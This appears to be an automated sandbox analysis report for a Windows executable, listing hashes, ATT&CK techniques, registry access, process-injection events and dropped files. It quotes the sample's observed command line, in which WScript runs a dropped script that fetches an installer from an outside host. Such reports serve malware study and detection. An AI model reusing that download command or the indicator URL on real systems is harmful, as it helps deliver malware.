0bde60ccc60a94db9d184e5a7b29b8b42df7756e3e8601afac1d34f7132539c7

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01/10/2024, 01:23

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe
Size

184KB
MD5

03e1ac5d4a4dbaa529a6073a2deeffcb
SHA1

a3ba5b25a101e0c6d8bd51ddee4edd5aa9724c79
SHA256

0bde60ccc60a94db9d184e5a7b29b8b42df7756e3e8601afac1d34f7132539c7
SHA512

e6a3cbcda439d6afb4a55d779554e9b006e428fdc0dd80c2e72a951088752435df3e1a10a5e76a0a4dc532b6d4e45bc7cfa45e7073478aa80dbb7cf4a4ddce76
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3m:/7BSH8zUB+nGESaaRvoB7FJNndnH

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	3064	WScript.exe
8	3064	WScript.exe
10	3064	WScript.exe
12	2784	WScript.exe
13	2784	WScript.exe
15	1532	WScript.exe
16	1532	WScript.exe
18	292	WScript.exe
19	292	WScript.exe
21	2244	WScript.exe
22	2244	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 3064	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	30
PID 2072 wrote to memory of 3064	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	30
PID 2072 wrote to memory of 3064	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	30
PID 2072 wrote to memory of 3064	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	30
PID 2072 wrote to memory of 2784	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	33
PID 2072 wrote to memory of 2784	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	33
PID 2072 wrote to memory of 2784	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	33
PID 2072 wrote to memory of 2784	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	33
PID 2072 wrote to memory of 1532	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	35
PID 2072 wrote to memory of 1532	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	35
PID 2072 wrote to memory of 1532	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	35
PID 2072 wrote to memory of 1532	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	35
PID 2072 wrote to memory of 292	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	37
PID 2072 wrote to memory of 292	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	37
PID 2072 wrote to memory of 292	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	37
PID 2072 wrote to memory of 292	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	37
PID 2072 wrote to memory of 2244	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	39
PID 2072 wrote to memory of 2244	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	39
PID 2072 wrote to memory of 2244	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	39
PID 2072 wrote to memory of 2244	2072	03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\03e1ac5d4a4dbaa529a6073a2deeffcb_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC439.js" http://www.djapp.info/?domain=cAvwepqmHM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufC439.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3064
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC439.js" http://www.djapp.info/?domain=cAvwepqmHM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufC439.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2784
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC439.js" http://www.djapp.info/?domain=cAvwepqmHM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufC439.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1532
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC439.js" http://www.djapp.info/?domain=cAvwepqmHM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufC439.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:292
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC439.js" http://www.djapp.info/?domain=cAvwepqmHM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXH C:\Users\Admin\AppData\Local\Temp\fufC439.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
44710f289312c6c664fef1b8b5142870

SHA1
f86721939084a8ba36349a2e9c87eda8890ef9fc

SHA256
a73f1cb9aceb82f690e0b2907ce412fdfc87142049a3c5e152d185a478adf2bc

SHA512
aaf149b22531507b7dc6e7e89b0aa8c1de365f4311cae3ddb4a69a5a14d1176d39db3b1d03f5fd0d705c5eff914aa6fe6810a68904bbaf53d5bbaf83dbc7640f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
60fbd3fc063dde2acd0565cdfc794402

SHA1
2f4a90bdfe7c186a7947827e06c0c8951aac0a83

SHA256
016c789fa862cef26db0ab6c46cdcf33f53cfc6f541165a7055580de059c5f8f

SHA512
51d341655d1f6219367b180114c0269c32dacdcc231f158f3bcc8239a3854944b1bf2ededa8298af1e35d45d08caab5fe3af4f3fc3d3be3cb5c20bfb31aa19e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\domain_profile[1].htm

Filesize
40KB

MD5
22d4b5dee7c19a85908c4f3fad5275d9

SHA1
9e921e989715354b6423315b199cd04524e5881d

SHA256
bd9aac2151e70bbb2f7e539858328b56372aee08fbe2d4548bc2df82511a79bb

SHA512
0e88ed12b17de524f6fef2673acbf3520b19b9798176befddfcfeee9a04356be6b5f6ce9bc100b93cb58fa3f266a94a107c9e662f90be9653045191fe40d073f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\domain_profile[1].htm

Filesize
40KB

MD5
282d6e1862ff454453c23743119e4ff2

SHA1
3f1ff5d72783de9bd58078ee1418ef9465522d83

SHA256
e5667fa5d1b7943c0a1d254d17e7bf44c6347bfb5d54871907c3b5a0d0dac0a5

SHA512
0ea174dd38bdcba5e56f8b1293a0c38b3657b1217971673259abaf40d0549e29c7ce424369da7ef25bae96a425024dc3fb675d8546a2c2d96e2185c3c9384f93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\domain_profile[1].htm

Filesize
40KB

MD5
02249ffba479fe0918ced6294eb3935f

SHA1
e402ff2bca119a3bac2fa14c50bd284da70ab619

SHA256
3b6784d1a675e5cad9553807f2f240646f9b3feba1ee2a69fbc2741daab7f102

SHA512
254aa2c20e6252d13f101df57d0e72c565d2e00a430c403ef0c77028af72e3a8b83709eb66a903eb669f7b667a46fd7f30ad01f6ce13622ad01e12b645bbe666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WUBCGJ0A\domain_profile[1].htm

Filesize
40KB

MD5
9f605b2882678956ad917209ae4af066

SHA1
389d3c7a3a35796c521a0e6aa06afc136be35fd6

SHA256
ddecacb35d39947efd7c9b14cfac3b03ed70a88680354ff472786cdab91e43dd

SHA512
555bd34204ede5bff74505a2ea7c549e41857dca306ec02db6e4be8191a6f8996aee00a0df4df64d494fa47c79aafee50b938d8bc21a5520107ca3f0429e30bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WUBCGJ0A\domain_profile[1].htm

Filesize
40KB

MD5
b2db7dd328349c463ccdd8d729bb50b7

SHA1
d674260cfc64bd18cb9d9c17856f59949cebb1ea

SHA256
52091c04d519aed026ce9415800ea5f203ecb3b2bf5faffa7f9ce0c6bf6fd305

SHA512
0ceacc1e90f2601cb40ad421a287aa9f0627af504ed0f3e6827e9fa95f36cc23f9c3de1f95df445abdc27b7d11e74329029557c3904d584a1a42013e94cb96ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC6F.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2463.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufC439.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UTANL0AE.txt

Filesize
175B

MD5
b3554b37e7b088d1f316c164cdeee2c7

SHA1
8d915bd927893ad7ee2a6e225f1e9617cb5c165d

SHA256
e0d38c86c492b29c191c67450e344c6c350ab6296fb1a4fea1cef472a0fba490

SHA512
f2aeee6cbc41b6781063bf601ba4c764b612b5b4b6d77a04edcd58fee3e6768f83667c74c6640a45e3633693483b2611c7f8422e5d5ad1c61f2a7cb4dcd0e55e

Download Submit